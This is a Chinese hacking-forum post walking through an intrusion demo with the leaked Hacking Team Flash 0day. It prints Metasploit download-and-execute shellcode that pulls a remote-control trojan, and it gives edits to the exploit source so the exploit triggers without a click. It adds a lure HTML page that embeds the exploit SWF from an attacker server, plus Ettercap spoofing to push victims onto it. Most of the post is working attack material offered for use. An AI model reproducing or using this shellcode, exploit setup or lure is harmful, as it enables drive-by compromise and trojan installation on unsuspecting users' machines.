找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2038|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

% W0 U4 q! O3 p7 _ 三、flash 0day之手工代码修改制作下载者实例入侵演示 % T5 |7 @7 F/ z# W( p

: u" n# g; }" S/ n) x

2 Z/ Z1 A: c$ O/ D) g, Y( ^* @ 利用到的工具: ; x/ D* E, u5 h$ C* \

, K4 ? a% F2 s6 X+ b& S6 O

: \. h: I; y% e e0 s0 b Msf 9 _6 \1 k! e/ C% S. f

3 C, e0 {9 ~# m* I& R

+ _& b# l& ]% \, E Ettercap 0 g' g0 o0 S) G0 {7 D

8 J% B! e8 l. A# z. V( P- J

) X+ Q8 t4 r- c Adobe Flash CS6 1 R7 R" z% }8 G+ X9 Z

! \1 g3 b1 H) u" M% ?5 m5 C

6 Z/ I* z W- z( J3 s/ Q; q6 y Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 ! o# o2 K- ~9 Q. m* L

; g$ s8 }& \: r3 `* N

: ~6 p! ~/ K: ]1 Z* i& }7 M 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options 0 O: k4 ~9 Q- [' j+ Z

: z6 ~5 o5 @# [

& H% ?, s( ]3 D" y! K2 a 如图: j$ n2 W( [9 G6 ?, ~5 t; A1 D

% ^, \+ M6 K, M8 W$ K' L5 r

4 L' i8 S' r m6 D) J   ) a% \* W1 V) K4 @

3 S# G' G+ `6 [3 ^: C \0 u: |

2 Z0 _# w+ v3 f8 F6 [9 {   # X; g, M2 v8 Y0 P) ?

$ O9 d; o& `0 i* d5 Y8 v, s

% S/ D1 B7 _, U" |* k2 L 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 7 s, R" ^( ~' i9 @: W

1 |. P4 l+ l* G- s

F8 e. p$ k2 J, d& m   % }8 h% z. @9 r

4 p% a* J0 e# M8 ?

) x9 b% Q* r% v* O( [8 v8 D* M   8 C* `- b. H2 }- h! e2 `

: S& l: }5 ^! ^$ s- f! G; r' E4 q

{. }# g- e' Y, ^: Y 然后执行generate -t dword生成shellcode,如下: # p, @+ U; \: p* |4 P9 i

2 w7 H% c0 v! e# |. V* ]! m

3 H1 f* m9 Y: g2 `9 q; c" c' @& g   4 Y7 v! D: Z3 D& `( }) C

9 C% y8 E2 L3 {

A: [+ t5 @* t1 m+ v% Z 复制代码到文本下便于我们一会编辑flash exp,如下: & }5 W5 S7 ^6 E% x' v; ?

% ]5 i- R3 o/ f3 b

! a4 ]& t+ e% Q9 \0 ^# c 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, * c4 `0 ?4 N a* J6 C* G! W

& N1 k+ Z0 }0 W% f* G

# Z g1 ?0 F) ]; ]8 I1 n 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, % `- X! ^% ?/ ?8 A

4 B; J- c% k$ p9 Z: V9 {1 K

- k/ {9 K3 t$ i8 j" U2 h- O' [ 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, % ?7 o7 ] U# t0 `7 l5 v

; H0 v: y/ p, d+ g2 P4 C' p3 I

2 d+ o& I' w4 n" H& E; o 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, ! T2 B- _) u/ J5 s% U

4 T3 \; u7 L& l! m+ n

9 D4 V8 t: Q; l* u 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, $ Z& ^) l1 }& S9 ]9 g2 C- v

' F2 [$ ] _8 v7 L

/ W4 L" B2 z7 h8 E& N 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, & c' n+ s8 P$ G/ I

% B! [* ~) h: f

( N% s# u0 U f" g' ~% J 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 6 F/ q# H4 x- A# N

; W* R6 d3 m' z1 q: ?1 N; C% W

/ K3 u- b2 f9 D3 D$ L5 R 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 0 y+ b. V( k o% G% L* t

2 X. ~' v/ X( }! ?' f

3 p( ]) t% H# W7 W0 C n 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 8 w/ V( w% T) e( G& ?/ u$ w, e

& E: a( B* d* O! B0 M, `. B9 i, {

+ I3 v u9 p w" b% {# N 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, 7 C: a, Q S% B. |& o# I

3 ]7 @1 ~" l1 K: g

b! ^* H+ Y7 x1 ? 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, , l1 y+ T4 ?6 _4 ], Y# O% C

0 c$ B4 W& I/ B6 K& e

8 c& `8 F' N5 W2 F; b8 ^& w# D 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 7 [9 U+ H- R9 c) b' M$ j5 j' p5 P

) H% [! M2 Z9 X5 r* K

' ~" v! ^! ~& i6 k( C8 p 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, & L: i9 i0 a% O/ [

8 G; M, L. q: |0 i8 j& ^

1 ]6 H7 R; l' B# S" B& C& F/ A X+ }& v 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 : u& X9 t. E% K$ |

3 n( q. k- m1 C

, c a2 V+ Q& k# ~' k) X) W2 K8 e   / J& p& D3 {" a$ n' H

- h! X( X- g# F

" F' ] w9 t& O! A1 r6 k   % Y9 I, u0 C$ ^% [' J

" B" y l% C$ ~2 ^0 K2 f

0 h/ T' }: f" n0 |6 a/ J 下面我们来修改flash 0day exp,需要修改三个文件,分别为: & ?7 b" O, X) a

5 {- j- `: f, m0 h9 m

2 A8 l3 q- {4 r3 G1 Q5 a# X5 n   + w. R5 ~5 u) L; P' W8 K8 U# c

' A- J# q5 m$ V% V( Q4 d4 D

0 [" |: E: [6 j& @+ o 先修改ShellWin32.as,部分源代码如图: . D& V; r0 V' l

* o/ o3 K4 l- W

+ Z3 |! ^" c0 T% ?) T# W; c$ T   4 {( Q D k( h% F, b6 ?4 s

1 d% ^/ D0 q+ j

# C- Y2 d/ J' L/ j* \ U 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: ( o- t- B5 ^* l4 g, r/ s9 Z2 x

6 W P; f0 g" ?0 m2 `1 R

H) x9 X2 M0 d& l+ }4 q: h   4 F2 S! s2 Z2 `! ^9 A/ i

$ F) i1 s2 j, M( Z

1 M7 \. \* B# c7 E4 I) D7 M 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: ) M7 J$ q4 m+ Z

, y6 a4 D6 ?( f* n7 t( W$ s( z K p

: b# f1 A* Y/ B1 F2 S% U9 `   . n4 V& ^3 u K' @* D6 h4 e; o- C

8 H0 g2 i" E+ b& a% i% }' a6 \) v3 I

! N! J; F9 K P% @# z* B 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: & a: g# k4 P1 w: B

! u# H1 `( W3 N% O5 g

6 ~- r- j+ U' H* D2 E1 Y   n a, P p7 m0 q

0 }- D/ a% H3 A4 Q! c

; t6 \6 ^6 W! o: q+ r4 Q   , [$ U$ k# ~% \7 [6 o+ f5 }

/ U! `0 H( @5 E0 q7 x9 l

( u4 P" d9 `. W, D1 }+ B" H   * G+ f% L3 @4 ]6 d* k( X

, |6 n# b! G. Z9 _8 U: X1 ^+ k5 O* E

" R7 d% D% B" Y$ m! L7 Z. ` 然后点保存,下面我们来编译一下,打开 3 Z& W6 B! [0 r" x* k5 r

~, I) M2 P- j8 M' y2 D

2 @# C. b, M, P4 I _. v+ | exp1.fla然后点文件-发布,看看编译没错误 * U' k( @ u& F a4 m) d3 L

/ J5 C6 S' Y. u8 u* T O& ^

9 T# T$ d& k- D j" R   ' B" S) v. e4 z

' A0 @. k& b/ a/ i8 A/ s

1 V+ F, f4 P( u/ E& i   5 [) ~& P0 @! D. x

" q( J, F- p6 j

' D1 Q# [1 c$ v9 F   2 t. m j) b# b8 N v

: H" o. v( t! X* \* K ]" R" o

! }* g- M0 W9 e% @/ B: ~   & ~! l3 \+ w: h7 p$ v

7 Z( j* p3 j2 K' R$ a$ s9 E

+ B2 o o8 x- B- o! H3 t$ N 然后我们把生成的 % w4 c5 i8 Y' _4 h$ n

# e" \% y% }- h& R" s

S& L5 v* G; g, \ exp1.swf丢到kailinux /var/www/html下: ' N: m. A* n& Y

+ d# C8 }1 g8 h0 z4 L+ H6 {

" y& a3 Y# T' s0 } 然后把这段代码好好编辑一下 , A- U) T. q, P: z8 o" p- f2 o

8 R& F G5 B- n2 A' z

5 u |. K% D, ~$ ^. k   " Z: r. x r/ p' v! @, p

6 \$ w: q9 I: L4 R9 S3 L0 f

+ K! c& Q" o& I) B# x6 f   4 x! ?! k7 s: ~9 b7 [/ i1 r

1 b1 L$ F# e, B/ X- F/ {

7 {8 F" R: d5 H- x; L0 V   0 s8 _/ W) O: k7 f, n, [ A

/ y7 s3 M1 o! r" p( }3 R

4 G4 v# L8 ]8 v   * k# R N& V. R9 X1 `0 D' B+ H3 v

) ^# `' P3 F. ~

O, I1 u. [0 X+ h8 Q+ I7 q   ( m7 T/ d5 [( Q+ C

) p) ~4 p/ G/ B8 |& L |

+ x. _0 b: t7 \7 @* J   % f5 Q' x0 E4 h5 @

$ N2 |- Z" n! j K+ ]5 n9 l

2 ]/ @3 K* u4 v* W9 d2 V <!DOCTYPE html> 7 j% n2 ]9 J# a0 j5 B3 i

6 }" R; }7 }) y- q/ W' y$ e/ m; H

7 {0 W: u* }3 a, \# H1 r; B, o# D <html> 3 |/ ~% T; F# I0 Z. n9 U2 I0 F

' ?2 x( M# \; d* R- s+ |

8 c- P# W4 S- J P$ m# z. g <head> * Z5 e" Y. H0 b, ^

" P; ]) n" f8 w

# t2 `1 b6 k' J0 Y! U* j& l- E <meta http-equiv="Content-Type" content="text/html; ( s- C2 k, U) ]- i

/ X: F% M' E4 D# V$ _

9 n5 ^( s9 C; f; M2 G charset=utf-8"/> 3 d0 t' g% t, t' \

! o6 E! t# h+ j

5 T# `- d6 N1 u' D </head> ; K$ p* X5 H) ?: {

4 M% ]9 [5 e+ ^' p9 w# V

$ G) [" x3 ~* W Z' x6 Q& | <body> . F/ D8 } B9 @% @8 E" G5 M

& i; ^2 I8 k+ J0 }3 _

; z# d |2 M( f9 x/ g& y <h2> Please wait, the requested page is loading...</h2> 7 M; V* G9 e2 ~4 j4 f# S' D

) ?% \( |) ^+ Y- t X

% W' d8 v# D9 R' h9 y* F: @; ] <br> * O* L, O3 g& R+ X2 _

& v, Q) D) E% c

0 b9 T+ n/ h' |/ b& B <OBJECT 1 t9 K, s b& D6 Z( I' w9 Q% T: B

& ~4 D0 V; V' d& s1 ~

3 D4 H! N3 x" s* h classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie : k1 s& D) Z' R: r- v, f

u5 X5 h5 e/ F- z2 y7 {

' C! w* W/ N- n6 K VALUE="http://192.168.0.109/exp1.swf"></OBJECT> ( X! s; V R# G& Z( C" Z7 }

& K" X K0 x) i; E7 Q+ W, T

! q c$ U& t) ?! h% O2 M6 g1 {0 a </body> / Z' o' ^+ H- T: i. r8 V' u9 `. p

% P9 W- P/ z* I8 V

$ h- g8 O# U6 R' A7 l; e4 U* S <script> 6 h5 Z" I: H5 M9 L

G5 f; D! p/ c

& Q8 x* H# M2 ~" D! c5 h$ {     setTimeout(function () { 5 N0 B# C( c6 [/ ~* t: p

% {. ~1 T4 n4 a3 U$ h b

& L! v3 X5 ^1 A2 E" s7 E1 N5 ?. W7 w          ( [( j' B3 r! f- Z* g# V* a' |

( M; h0 V$ J; r6 J

3 j7 f. r7 J( l* R" f6 P window.location.reload(); G+ V, P: x0 s

$ B4 i9 H$ v9 r

/ n! |* w; H: I6 G2 M4 j7 i     }, 10000); 5 d6 b' u2 |3 \

" @& c/ K- q) m

7 F# e8 o) g0 ^8 K1 N+ w   $ M, c0 \# u+ ?# t) K7 {6 T0 q2 x

' ^( N2 [. g+ Z& ~

; a+ }7 [ L; _8 k7 N& v3 S/ B </script> " u/ j) z2 B1 e E1 k, ~4 g3 Z% l

5 K1 s2 O& d( H9 Q

4 y ~- j, ^" j6 d </html> ; J( ^6 U. @9 j T

4 V: [* B2 y( h. [

) \; G" U; U0 [; Z8 r* E& A   1 N N, Q6 H7 |& k7 K0 d

% q0 |% p) J0 e- ~2 K0 w

% c+ b Z" P& ^+ Y7 q 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 1 H- F1 S1 C9 K1 Y2 Y* y

% ~4 }# D$ p( V7 b

5 v6 k0 B: U4 [   1 P( y- t. C9 B7 @$ A/ [

4 z" R& h$ [9 Y' S2 V, ~/ ]: a

- Q4 {6 c5 ~: h; \4 M   ( }5 |- \+ T8 J+ n

. A% J8 k) e6 G3 ~( W7 ^3 p& U

5 K6 A; \! L4 A q- \2 p2 a   2 j3 O- n6 i# R3 A

7 X: t- R. T* r3 ]1 W( h

) j; U n* |5 [7 M: J1 \   . j% ]2 ~* M8 W/ Q1 p Z

+ ^+ |5 P% K0 W0 q5 G* S

) D1 n% O( `4 p( ~   2 a. P& X7 u" O; W. V' L! V

0 S) [1 T- V* U2 ?

0 N; J" B4 r4 k b 下面我们用ettercap欺骗如图: 0 e( @: l! O/ A: i+ J, r8 x7 n

+ k/ c% z# e$ x: }! R# \ W! X

0 E# `9 t$ i! }   ! W& P: r$ K' M0 u, Q4 A1 r1 D

4 v5 X5 b; Y N; b

; N3 y& t& n% U7 O! w2 }   0 K. `5 ~& K K8 ]" V

% t( ]5 h- o: t4 c

9 N- s' |" A2 U 下面我们随便访问个网站看看: + x' `1 \- B9 ?& G8 \( O

) i6 l2 f& ?+ [6 O1 m

1 p, e0 r8 A4 R2 c5 t# X6 E 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: ! k& P, x$ c4 E

. k }, |4 M- h" S, u6 p+ F

* K( R" v. k' J! S7 o$ l( `   ; d$ g" ~4 D" R+ u K; e

5 J9 N' B% \5 O8 C

1 N4 Y. z) ]) r0 z+ o 我们看另一台, 9 |4 f6 l" s. l: X( X( j

. C% e" |. N: J6 v- {% U7 s

: L# ?" @" }: O( v$ r! A 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 8 O9 I- a$ J9 Q! t

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表